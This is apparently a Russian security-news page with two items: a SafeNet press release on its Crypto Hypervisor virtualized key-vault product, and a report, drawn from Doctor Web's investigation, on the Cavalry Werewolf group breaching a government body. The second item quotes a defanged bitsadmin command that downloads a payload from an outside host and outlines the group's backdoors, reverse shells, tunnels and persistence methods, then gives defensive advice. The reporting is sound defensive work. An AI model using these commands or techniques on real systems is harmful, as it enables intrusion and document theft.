SafeNet открывает новую эру адаптивного шифрования

SafeNet открывает новую эру адаптивного шифрования

Сегодня, когда профессионалы в области ИТ-безопасности теряют веру в надежность систем для защиты периметра, и организации все чаще вынуждены внедрять в своей ИТ-инфраструктуре облачные стратегии и консолидировать ресурсы своих центров обработки данных, особую важность получает вопрос, каким образом эффективнее всего осуществить безопасную миграцию в публичное, частное или гибридное облачное окружение.

В рамках своей стратегии Secure Breach компания SafeNet сегодня объявила об ограниченной доступности  решения SafeNet Crypto Hypervisor, которое с целью предотвращения потери данных позволяет корпоративным заказчикам эффективным образом виртуализировать свои криптографические ресурсы, поддерживает возможность расширения, гарантирует безопасное шифрование данных даже при миграции в виртуализированное окружение.

С помощью решения SafeNet Crypto Hypervisor ИТ-подразделения и поставщики услуг смогут по мере необходимости осуществлять доставку сервисов хранения адаптивных ключей (elastic key vaulting) и сервисов шифрования для защиты данных в физическом, виртуальном и облачном окружениях не за дни, как было раньше, а за минуты. Сервисы высоконадежного шифрования, реализованные в системе, полностью отвечают требованиям, предъявляемым к облачным моделям. Система обеспечивает все преимущества виртуализации с точки зрения оптимизации затрат и повышения уровня инноваций, без ущерба для безопасности и с полным соблюдением установленных требований. При этом сохраняется полный централизованный контроль за доставкой сервисов шифрования, таких как безопасное хранение ключей. Пользователь получает полный контроль над своими сервисами шифрования и может быть уверенным, что его ключи шифрования не доступны для других пользователей или для администраторов системы.

"Хотя шифрование все чаще встречается в ИТ-практике компаний, безопасность данных полностью зависит от безопасности ключей, с помощью которых эти данные защищены, – говорит Кристиан Кристиансен (Christian A. Christiansen), вице-президент IDC по продуктам и услугам безопасности в IDC. Хранение ключей на специализированном аппаратном обеспечении, например, на аппаратных модулях безопасности, является наиболее предпочтительной передовой практикой. Однако до сих пор аппаратные решения шифрования не отличались достаточной динамичностью и гибкостью, которые необходимы в виртуализированных и облачных окружениях. Развертывание виртуального приложения, требующего шифрования, подписанных цифровых сертификатов или других функций PKI, зачастую увеличивало сроки реализации проекта на несколько дней, а то и недель".

Решение SafeNet Crypto Hypervisor позволяет справиться с этими задачи благодаря расширению и виртуализации аппаратного модуля безопасности SafeNet Luna SA 5 Hardware Security Module (HSM), за счет чего он может использоваться в ИТ-моделях с виртуальным и облачным окружением. Администраторы криптографических систем могут централизованно управлять и конфигурировать решение Crypto Hypervisor через центр управления SafeNet Crypto Command Center. При этом администраторы могут создавать каталоги сервисов, доступных в Crypto Hypervisor, а пользователи могут через веб-портал просматривать персонализированные каталоги тех сервисов, для развертывания которых у них имеются права. Эти пользователи могут использовать необходимые им сервисы в режиме по требованию на общем физическом оборудовании. Этот процесс позволяет сократить сроки развертывания новых сервисов с нескольких дней до нескольких минут.

Решение SafeNet Crypto Hypervisor обеспечивает заказчикам следующие преимущества:

  • Криптографические сервисы, совместимые с облачным окружением: Созданное для облачной модели решение Crypto Hypervisor позволяет организациям консолидировать нагрузку по осуществлению шифрования, устранить, так называемые, "островки шифрования" и обеспечить более безопасную и эффективную работу. Организации могут задействовать всего лишь пять процентов от сегодняшнего количества единиц используемого аппаратного обеспечения для осуществления того же объёма услуг шифрования.
  • Снижение общей стоимости: При первичной инициализации каталог сервисов шифрования может определяться центральной группой администраторов. После этого, различные пользователи из различных организаций могут заказывать эти высоконадежные сервисы защищенного хранения ключей по мере необходимости непосредственно из этого онлайн-каталога. В результате новые сервисы, для доставки которых обычно требовалось несколько дней или даже недель, теперь могут быть реализованы за несколько минут, без вмешательства центральной ИТ-организации.
  • Централизованное управление: Центр управления Crypto Command Center позволяет работать с сотнями независимых виртуализированных аппаратных модулей HSM. При этом для всех функций реализован аудит с фиксированием попыток несанкционированного доступа и ведением журналов доступа с цифровой подписью. Подобное централизованное управление и журналирование позволят заказчикам создать центры передовых технологий в области шифрования и оптимизировать процессы аудита.

Наиболее безопасная технология хранения ключей: Решение Crypto Hypervisor представляет собой виртуализированную версию надежных и проверенных аппаратных модулей безопасности SafeNet Luna HSMs, которые сегодня ежедневно используются для защиты финансовых транзакций с совокупным дневным оборотом более 1 триллиона долларов; обеспечивают доступность на уровне 99,999% и которым доверяют предприятия и правительства по всему миру.

Комментарий руководителя SafeNet

"Переход к виртуализации и облачным вычислениям коренным образом изменили характер работы с данными и то, как мы их храним и защищаем. Это, в свою очередь, заставляет нас пересмотреть механизмы совместного использования и управления ресурсами для шифрования. До появления Crypto Hypervisor работа ИТ-подразделений по развертыванию сервисов шифрования, в основном, производилась вручную и являлась чрезвычайно медленным процессом. В свою очередь, всё это замедляло внедрение облачных технологий. Теперь запуск сервиса шифрования можно сравнить с таким элементарным процессом, как развертывание очередной виртуальной машины".

Цион Гонен, главный директор по стратегии, SafeNet, Inc.

Комментарий руководителя заказчика

“Компания Landis+Gyr является ведущим мировым поставщиком решений для управления интеллектуальными энергосистемами, в частности, в сфере энергетики, поставки газа и водных ресурсов. Наши заказчики предъявляют очень высокие требования к обеспечению безопасности и конфиденциальности в наших измерительных решениях. Для защиты счетчиков мы используем архитектуры на базе PKI, которая, на наш взгляд, является оптимальной технологией безопасности, обеспечивает целостность данных и позволяет сохранить конфиденциальность заказчиков. Технологии SafeNet помогают нам удовлетворить требования наших заказчиков. Мы высоко ценим постоянные инновации, поскольку именно инновации дают нам уверенность, что SafeNet будет по-прежнему готова помочь нам с решением наиболее сложных задач в области защиты данных и обеспечения конфиденциальности,  с которыми сталкиваются наши клиенты". 

—   Тим Виденбах (Tim Weidenbach), вице-президент по управлению продукцией
Landis+Gyr

“В компании Xceedium мы используем продукцию SafeNet для безопасной доставки услуг нашим заказчикам. Решение SafeNet Crypto Hypervisor обладает огромным потенциалом и способно в корне изменить правила игры. Нетрудно представить себе эффект от использования нового поколения наших продуктов, а также ту экономию затрат и те преимущества, которые получают в результате наши заказчики".

—   Патрик МакБрайд(Patrick McBride),
вице-президент по маркетингу 
Xceedium

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Группировка Cavalry Werewolf взломала сеть госоргана с помощью бэкдоров

В июле 2025 года к специалистам компании «Доктор Веб» обратился клиент из госсектора с жалобой на рассылку подозрительных писем с корпоративного почтового ящика. Расследование показало: перед ними была целевая кампания кибергруппировки, которую аналитики идентифицировали как Cavalry Werewolf.

Цель атаки — сбор конфиденциальной информации и картирование сети для дальнейшего закрепления внутри инфраструктуры.

Начали злоумышленники банально, но эффективно — с фишинга. В качестве «приманки» приходили архивы с паролем и вложенным бэкдором BackDoor.ShellNET.1 (основан на открытом проекте Reverse-Shell-CS). Файлы маскировались под служебные записки и другие официальные документы — имена были соответствующие, чтобы снизить бдительность получателя.

 

После запуска BackDoor.ShellNET.1 атакующие использовали стандартный для Windows инструмент bitsadmin для скачивания дополнительных полезных нагрузок (пример: bitsadmin /transfer www /download hxxp://…/winpot.exe). Среди загруженных модулей оказался стилер Trojan.FileSpyNET.5, который массово тянул документы (.doc/.docx/.xlsx/.pdf), текстовые файлы и изображения. Для скрытого доступа применяли BackDoor.Tunnel.41 (вариант ReverseSocks5) — с его помощью создавались SOCKS5-туннели и обеспечивалось скрытое подключение к заражённому ПК.

Дальше — больше: специалисты «Доктор Веб» обнаружили целый набор инструментов, как собственных, так и основанных на open-source. В арсенале группировки — скриптовые загрузчики (например, BAT.DownLoader.1138), «упакованные» трояны (Trojan.Packed2.49708, Trojan.Siggen31.54011 и т. п.), бэкдоры, управляемые через телеграм-ботов (BackDoor.Siggen2.5463, BackDoor.ShellNET.2), а также прокси-модули типа BackDoor.ReverseProxy.1. Некоторые варианты внедряли полезную нагрузку в легитимные процессы — например, инжектировали данные в aspnet_compiler.exe, чтобы бэкдор выполнялся в контексте доверенного приложения.

 

Интересно, что злоумышленники активно пользуются открытими решениями: либо берут код «как есть», либо модифицируют его под свои нужды. Для доставки следующей волны вредоносов они используют стандартные утилиты — PowerShell, bitsadmin, curl — а для сохранения присутствия в системе модифицируют автозагрузку через реестр (HKCU\...\Run) или ставят исполняемые файлы в C:\users\public\pictures и похожие публичные папки.

Атака Cavalry Werewolf показала типичную для целевых кампаний логику: разведка (whoami, ipconfig, просмотр директорий), проверка прокси и сети, затем загрузка инструментов и закрепление. Также злоумышленники могли позже использовать скомпрометированные устройства для перехода в другие сети — например, при смене работы жертвы — и разворачивать дальнейшие атаки через доверенные каналы.

Отдельные особенности группировки, которые отмечают аналитики «Доктор Веб»: предпочтение к open-source-инструментам, частое использование обратных шеллов и SOCKS-туннелей, внедрение вреда в видимо «безобидные» программы и управление через Telegram API. Фишинговые рассылки имитируют сообщения от государственных органов — это снижает подозрительность целевой аудитории и повышает шансы успешной компрометации.

Рекомендации для организаций — стандартный, но действенный набор мер: усилить фильтрацию почты и блокировку подозрительных вложений, ограничить возможность запуска bitsadmin/PowerShell неподписанных скриптов, включить контроль исполнения (application control) и EDR, регулярно проверять целевые публичные папки, применять многофакторную аутентификацию и оперативно реагировать на подозрительные соединения с неизвестными C2-адресами. При обнаружении инцидента — немедленно изолировать пострадавшие хосты и провести полноценную форензику, чтобы выявить степень компрометации.

Расследование «Доктор Веб» — ещё одно напоминание: даже крупные организации с государственным уровнем защиты уязвимы к грамотному фишингу и тому, что за ним следует. В современных целевых атаках именно сочетание человеческой ошибки и хорошо отлаженных инструментов злоумышленников делает наибольший ущерб.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru